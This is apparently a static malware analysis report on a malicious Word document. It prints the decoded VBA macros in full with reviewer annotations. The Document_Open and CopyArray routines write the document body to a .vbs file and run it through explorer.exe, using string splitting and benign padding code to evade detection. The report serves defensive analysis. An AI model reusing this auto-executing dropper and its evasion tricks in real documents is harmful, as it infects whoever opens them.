Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 60ed6d1f65ce9492…

MALICIOUS

Office (OLE)

1.13 MB Created: 2020-10-20 10:27:00 Authoring application: Microsoft Office Word First seen: 2020-12-28
MD5: ee2f686149c0739d4178ddb6a4f58c6e SHA-1: 20b19893f6bc4c689bee6c465bd2a3862b840613 SHA-256: 60ed6d1f65ce9492af796964501978d2c2fc5a2ea7803f1fef34741626652857
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The file contains VBA macros, including a Document_Open macro that runs CopyArray as soon as the document is opened (a standard auto-execution trigger). The extracted CopyArray routine creates C:\Required, writes the document's own body text (ActiveDocument.Range) into C:\Required\DOMDocument.vbs through Scripting.FileSystemObject, and then launches it with WshShell.Exec "explorer.exe C:\Required\DOMDocument.vbs". The second stage is therefore carried inside the document body rather than downloaded; the ".vb" + "s" string split and the explorer.exe hop look like attempts to defeat literal string matching and parent-process rules (WINWORD.EXE → wscript.exe). The ClamAV name (EmbeddedBase64Exe) suggests that body text is, or decodes to, a Base64-encoded executable, but the document body is not shown in this report. The 'SE_PASSWORD_ARCHIVE_LURE' heuristic indicates the document may be instructing the user to open a password-protected archive, a common tactic to bypass security scanning. Caveat: no URL or download routine appears in the extracted macro, so the T1105 (Ingress Tool Transfer) mapping is not supported by the visible code and should be confirmed against the dropped VBScript in a sandbox.

Heuristics 8

  • ClamAV: Doc.Dropper.EmbeddedBase64Exe-9865902-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.EmbeddedBase64Exe-9865902-1
  • Heap-spray pattern detected high SC_HEAP_SPRAY
Repeated 0x41 (A) bytes found. Caveat: a long run of identical bytes inside an OLE container is commonly padding or filler rather than a heap-spray NOP sled, and the listing below is simply that run decoded as x86 (`0x41` = `inc ecx`). This sample's visible execution path is a VBA dropper that needs no memory corruption, so treat this finding as low-confidence unless a separate exploit component is identified.
    Disassembly
    Attempted x86 opcode disassembly
    0000258E  41                inc ecx
    0000258F  41                inc ecx
    00002590  41                inc ecx
    00002591  41                inc ecx
    00002592  41                inc ecx
    00002593  41                inc ecx
    00002594  41                inc ecx
    00002595  41                inc ecx
    00002596  41                inc ecx
    00002597  41                inc ecx
    00002598  41                inc ecx
    00002599  41                inc ecx
    0000259A  41                inc ecx
    0000259B  41                inc ecx
    0000259C  41                inc ecx
    0000259D  41                inc ecx
    0000259E  41                inc ecx
    0000259F  41                inc ecx
    000025A0  41                inc ecx
    000025A1  41                inc ecx
    000025A2  41                inc ecx
    000025A3  41                inc ecx
    000025A4  41                inc ecx
    000025A5  41                inc ecx
    000025A6  41                inc ecx
    000025A7  41                inc ecx
    000025A8  41                inc ecx
    000025A9  41                inc ecx
    000025AA  41                inc ecx
    000025AB  41                inc ecx
    000025AC  41                inc ecx
    000025AD  41                inc ecx
    000025AE  41                inc ecx
    000025AF  41                inc ecx
    000025B0  41                inc ecx
    000025B1  41                inc ecx
    000025B2  41                inc ecx
    000025B3  41                inc ecx
    000025B4  41                inc ecx
    000025B5  41                inc ecx
    000025B6  41                inc ecx
    000025B7  41                inc ecx
    000025B8  41                inc ecx
    000025B9  41                inc ecx
    000025BA  41                inc ecx
    000025BB  41                inc ecx
    000025BC  41                inc ecx
    000025BD  41                inc ecx
    000025BE  41                inc ecx
    000025BF  41                inc ecx
    000025C0  41                inc ecx
    000025C1  41                inc ecx
    000025C2  41                inc ecx
    000025C3  41                inc ecx
    000025C4  41                inc ecx
    000025C5  41                inc ecx
    000025C6  41                inc ecx
    000025C7  41                inc ecx
    000025C8  41                inc ecx
    000025C9  41                inc ecx
    000025CA  41                inc ecx
    000025CB  41                inc ecx
    000025CC  41                inc ecx
    000025CD  41                inc ecx
    000025CE  41                inc ecx
    000025CF  41                inc ecx
    000025D0  41                inc ecx
    000025D1  41                inc ecx
    000025D2  41                inc ecx
    000025D3  41                inc ecx
    000025D4  41                inc ecx
    000025D5  41                inc ecx
    000025D6  41                inc ecx
    000025D7  41                inc ecx
    000025D8  41                inc ecx
    000025D9  41                inc ecx
    000025DA  41                inc ecx
    000025DB  41                inc ecx
    000025DC  41                inc ecx
    000025DD  41                inc ecx
    000025DE  41                inc ecx
    000025DF  41                inc ecx
    000025E0  41                inc ecx
    000025E1  41                inc ecx
    000025E2  41                inc ecx
    000025E3  41                inc ecx
    000025E4  41                inc ecx
    000025E5  41                inc ecx
    000025E6  41                inc ecx
    000025E7  41                inc ecx
    000025E8  41                inc ecx
    000025E9  41                inc ecx
    000025EA  41                inc ecx
    000025EB  41                inc ecx
    000025EC  41                inc ecx
    000025ED  41                inc ecx
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    On Error Resume Next
    Set Wildcard = CreateObject("Scripting.FileSystemObject")
    Set Gotchas = Wildcard.CreateFolder("C:\Required")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    CopyArray
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace found in ordinary Office files and is not an indicator on its own.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10629 bytes
SHA-256: 353639889fd785682c78494c5e5d456313b3471a11c7a39defccbc9cab160eec
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Auto-execution trigger: Word runs Document_Open when the document is opened
' (after macros are enabled). Its only action is to call CopyArray with no
' arguments; the dropper logic lives in that routine (second module below).
Private Sub Document_Open()
CopyArray
End Sub

Attribute VB_Name = "BetweenArrays"
' Second VBA stream of the project (olevba concatenates the extracted modules
' into one listing). The comment block below describes the public "CopyArray"
' array-copy utility whose code appears at the end of this module; the
' module-level fields and the Execute/property members in between belong to an
' XML-to-Word mail-merge helper. None of that helper is called from
' Document_Open in the visible listing — presumably benign-looking padding.


' startingpoint = starting point in source array.
' numberofvalues = number of elements of the array to copy from source to dest array.
' Rules:
' 0. Input Variant SourceArray and DestArray params must be arrays, otherwise the Sub()
' exits with nothing done. Either may, however, be passed in with a length of 0 (ie, Ubound = 0)
' 1. All values in dest array are wiped out unless the operation exited due to exit conditions
' as mentioned below.
' 2. Dest array is returned the same size of the source array or whatever the length of the
' numberofvalues is, if that is > 0.
' 3. Dest array never has trailing empty array values unless they are part of the coopyable
' values from the source array.
' 4. If startingpoint > length of source array, operation exits without changes to the dest array
' 5. If numberofvalues = 0, then all values from the source array starting from startingpoint

' Module-level state for the mail-merge helper. Note that oWord and nRef, used
' by Execute/Class_Initialize/Class_Terminate below, are NOT declared anywhere
' in the visible listing.
Dim m_oXML
Dim m_sSource As String
Dim m_sWordTemplate As String
Dim m_bFile As Boolean
Dim m_sErr As String
Dim m_sDocPath As String
Dim m_sDocPrefix As String

' Sets the XML source to a file path; Execute then uses m_oXML.Load.
' No visible caller in the listing.
Public Property Let XMLFile(sFileName As String)

    m_sSource = sFileName
    m_bFile = True
    
End Property

' Sets the XML source to an in-memory string; Execute then uses m_oXML.LoadXML.
' No visible caller in the listing.
Public Property Let XMLString(sStr As String)

    m_sSource = sStr
    m_bFile = False
    
End Property

' Mail-merge helper: loads XML from m_sSource, and for each child of the root
' element creates a new Word document from m_sWordTemplate, fills its MailMerge
' fields from the matching XML nodes (table fields are expanded one row per
' repeated sibling node) and saves it as <path><prefix><n>.doc.
'
' Review notes:
'  - Not called anywhere in the visible listing (Document_Open only calls
'    CopyArray); this looks like padding lifted from a legitimate utility.
'  - Uses oWord, which is not declared in the visible listing.
'  - Declared As Boolean but never assigns a return value.
Public Function Execute() As Boolean

    Dim bLoaded As Boolean
    Dim oWordDoc As Word.Document
    Dim oWordField As Word.MailMergeField
    Dim oWordTable As Word.Table
    Dim oWordFieldRange As Word.Range
    Dim oXMLDocNode As MSXML.IXMLDOMNode
    Dim oXMLFieldNode As MSXML.IXMLDOMNode
    Dim oXMLParentNode As MSXML.IXMLDOMNode
    Dim oXMLNextNode As MSXML.IXMLDOMNode
    Dim oXMLDoc As MSXML.IXMLDOMNode
    Dim nParentIndex As Integer
    Dim nRow As Integer
    Dim nCol As Integer
    Dim bRowColFound As Boolean
    Dim bTableField As Boolean
    Dim sFieldSplit() As String
    Dim n As Integer
    Dim i As Integer
    Dim sPath As String
    Dim bTablesProcessed() As Boolean
    Dim nTable As Integer
    
    ' oWord is undeclared in the visible listing (see Class_Initialize).
    oWord.Visible = True
    
    If m_oXML Is Nothing Then
        Set m_oXML = New MSXML.DOMDocument
    End If
    m_oXML.async = False
    
    ' m_bFile is set by the XMLFile / XMLString property setters.
    If m_bFile Then
        bLoaded = m_oXML.Load(m_sSource)
    Else
        bLoaded = m_oXML.LoadXML(m_sSource)
    End If
    
    If bLoaded Then
        
        ' Output directory defaults to the template's directory (GetPath is
        ' not defined in the visible listing).
        If m_sDocPath = "" Then
            sPath = GetPath(m_sWordTemplate)
        Else
            sPath = m_sDocPath
        End If
        
        Set oXMLDoc = m_oXML.DocumentElement
        
        If oXMLDoc.HasChildNodes Then
            ' One output document per child of the XML root.
            For Each oXMLDocNode In oXMLDoc.ChildNodes
           
                Set oWordDoc = oWord.Documents.Add(m_sWordTemplate, False)
                ReDim bTablesProcessed(oWordDoc.Tables.Count)
                For Each oWordField In oWordDoc.MailMerge.Fields
                    
                    oWordField.Select
                    Set oWordFieldRange = oWord.Selection.Range
                
                    ' Determine whether this field sits inside a table, and which one.
                    bTableField = False
                    nTable = -1
                    For Each oWordTable In oWordDoc.Tables
                        nTable = nTable + 1
                        If oWordFieldRange.InRange(oWordTable.Range) Then
                            bTableField = True
                            Exit For
                        End If
                    Next oWordTable
                    
                    ' Field code is split on spaces; the third token is then split
                    ' on "_" to yield the XML path segments to walk.
                    sFieldSplit = Split(oWordField.Code, " ")
                    sFieldSplit = Split(sFieldSplit(2), "_")
                    
                    Set oXMLFieldNode = oXMLDocNode
                    Set oXMLParentNode = Nothing
                    For n = LBound(sFieldSplit) To UBound(sFieldSplit)
                    
                        Set oXMLFieldNode = oXMLFieldNode.SelectSingleNode(sFieldSplit(n))
                        If oXMLFieldNode Is Nothing Then
                            Exit For
                        End If
                        ' For table fields, a node followed by a same-named sibling
                        ' marks the repeating element that drives row expansion.
                        If bTableField And oXMLParentNode Is Nothing Then
                            Set oXMLNextNode = oXMLFieldNode.NextSibling
                            If Not oXMLNextNode Is Nothing Then
                                If oXMLNextNode.BaseName = oXMLFieldNode.BaseName Then
                                    Set oXMLParentNode = oXMLFieldNode
                                    nParentIndex = n
                                    Exit For
                                End If
                            End If
                        End If
                    Next n
                    
                    If bTableField And Not oXMLParentNode Is Nothing Then
                        nRow = 0
                        nCol = 0
                        ' Walk the repeating siblings, one table row each.
                        Do While Not oXMLParentNode Is Nothing
                            Set oXMLFieldNode = oXMLParentNode
                            For n = nParentIndex + 1 To UBound(sFieldSplit)
                                Set oXMLFieldNode = oXMLFieldNode.SelectSingleNode(sFieldSplit(n))
                                If oXMLFieldNode Is Nothing Then
                                    Exit For
                                End If
                            Next n
                            If oXMLFieldNode Is Nothing Then
                                oWordFieldRange.Text = "Unresolved fieldname"
                            Else
                                If nRow = 0 Then
                                    ' First occurrence: locate the field's cell.
                                    bRowColFound = False
                                    For nRow = 1 To oWordTable.Rows.Count
                                        For nCol = 1 To oWordTable.Columns.Count
                                            If oWordFieldRange.InRange(oWordTable.Cell(nRow, nCol).Range) Then
                                                bRowColFound = True
                                                Exit For
                                            End If
                                        Next nCol
                                        If bRowColFound Then
                                            Exit For
                                        End If
                                    Next nRow
                                    oWordFieldRange.Text = oXMLFieldNode.ChildNodes.Item(0).Text
                                Else
                                    ' Subsequent occurrences: add a row (only the first
                                    ' field processed for this table inserts rows).
                                    nRow = nRow + 1
                                    If Not bTablesProcessed(nTable) Then
                                        If nRow <= oWordTable.Rows.Count Then
                                            oWordTable.Rows.Add oWordTable.Rows.Item(nRow)
                                        Else
                                            oWordTable.Rows.Add
                                        End If
                                    End If
                                    oWordTable.Cell(nRow, nCol).Range.Text = oXMLFieldNode.ChildNodes.Item(0).Text
                                End If
                                Set oXMLParentNode = oXMLParentNode.NextSibling
                            End If
                        Loop
                        bTablesProcessed(nTable) = True
                     Else
                         If oXMLFieldNode Is Nothing Then
                             oWordFieldRange.Text = "Unresolved fieldname"
                         Else
                             oWordFieldRange.Text = oXMLFieldNode.ChildNodes.Item(0).Text
                         End If
                    End If
                    
                Next oWordField
                
                i = i + 1
                oWordDoc.SaveAs sPath + m_sDocPrefix + CStr(i) + ".doc"
                'oWordDoc.Close
                
            Next oXMLDocNode
            
        End If
    
    Else
    
    End If
    Set m_oXML = Nothing
    
End Function

' Reference-counts a shared Word.Application in nRef/oWord. Neither name is
' declared in the visible listing, and Class_Initialize only fires for class
' modules — further sign that this member was pasted from another project.
Private Sub Class_Initialize()
    
    If nRef = 0 Then
        Set oWord = New Word.Application
    End If
    nRef = nRef + 1
        
End Sub

' Counterpart of Class_Initialize: releases the XML document and, when the
' last reference goes away, the shared Word.Application (nRef/oWord undeclared
' in the visible listing).
Private Sub Class_Terminate()

    Set m_oXML = Nothing
    nRef = nRef - 1
    If nRef = 0 Then
        Set oWord = Nothing
    End If

End Sub

' Returns m_sErr. Nothing in the visible listing ever assigns m_sErr, so this
' always yields an empty string here.
Public Property Get LastError() As String

    LastError = m_sErr

End Property

' Template path used by Execute for Documents.Add. No visible caller.
Public Property Let WordTemplate(sWordTemplate As String)
    
    m_sWordTemplate = sWordTemplate
    
End Property

' Output directory used by Execute when saving generated documents. No visible caller.
Public Property Let Path(sPath As String)

    m_sDocPath = sPath
    
End Property

' File-name prefix used by Execute for generated documents. No visible caller.
Public Property Let DocumentPrefix(sPrefix As String)

    m_sDocPrefix = sPrefix
    
End Property

' Malicious entry point, reached from Document_Open (ThisDocument) with NO
' arguments. The signature and the array-copy logic after the Exec call match
' the public "CopyArray" utility described in the header comment; the dropper
' statements are spliced into its parameter-validation branch so the routine
' still reads like the benign helper.
Public Sub CopyArray(Optional SourceArray As Variant, _
Optional DestArray As Variant, _
Optional startingpoint As Long = 1, Optional numberofvalues As Long = 0)
' With both optional arrays omitted (the Document_Open call) IsArray() is False
' for each, so this branch is taken.
If (Not IsArray(SourceArray)) Or (Not IsArray(DestArray)) Then
' Suppresses every runtime error for the rest of the procedure; there is no
' later On Error GoTo 0.
On Error Resume Next
Set Wildcard = CreateObject("Scripting.FileSystemObject")
Set Gotchas = Wildcard.CreateFolder("C:\Required")
' ".vb" + "s" assembles the ".vbs" extension at run time, presumably to avoid
' a literal ".vbs" in the macro text.
Wildcard.createtextfile ("C:\Required\DOMDocument.vb" + "s")
' Reopens the file for append (iomode 8; third argument presumably create=True)
' and writes the whole document body text into it: the second-stage VBScript
' is carried in the document itself, not downloaded.
Set ASCIIfile = Wildcard.opentextfile("C:\Required\DOMDocument.vb" + "s", 8, 1)
ASCIIfile.writeline ActiveDocument.Range
End If
ASCIIfile.Close
' Purpose of this second folder is not evident from the listing.
Set Gotchas = Wildcard.CreateFolder("C:\Required\occurs")
' NOTE(review): UBound on a Missing Variant raises an error; under
' On Error Resume Next execution is expected to continue into the block, which
' is what makes Wildcard a WshShell for the Exec below — confirm dynamically.
If UBound(SourceArray) = 0 Then
' Needs the "Windows Script Host Object Model" project reference (the
' SC_STR_WSCRIPT hit); replaces the FileSystemObject held in Wildcard.
Set Wildcard = New WshShell
ReDim DestArray(0 To 0)
End If
' Launches the dropped script via explorer.exe, so the script host is spawned
' under explorer.exe rather than as a direct child of WINWORD.EXE — presumably
' to sidestep parent/child process detections. Everything after this line is
' the original array-copy logic and performs no further system actions.
Wildcard.Exec "explorer.exe C:\Required\DOMDocument.vb" + "s"
If startingpoint < 1 Then
startingpoint = 1
End If
If numberofvalues < 0 Then
numberofvalues = 0
End If
If startingpoint > UBound(SourceArray) Then
Exit Sub
End If
If numberofvalues > 0 And _
(startingpoint + numberofvalues) > UBound(SourceArray) Then
Exit Sub
End If
Dim lngDestLength As Long, lngCnt As Long
If numberofvalues = 0 Then
lngDestLength = (UBound(SourceArray) - startingpoint) + 1
Else
lngDestLength = numberofvalues
End If
ReDim DestArray(lngDestLength)
For lngCnt = 1 To lngDestLength
DestArray(lngCnt) = SourceArray((startingpoint + lngCnt) - 1)
Next
Exit Sub
' Dead code: both MsgBox lines follow an unconditional Exit Sub and no error
' handler label jumps here.
MsgBox "CopyArray(): Error occurred.", vbInformation, "Error occurred."
MsgBox Err.Number & ": " & Err.Description
End Sub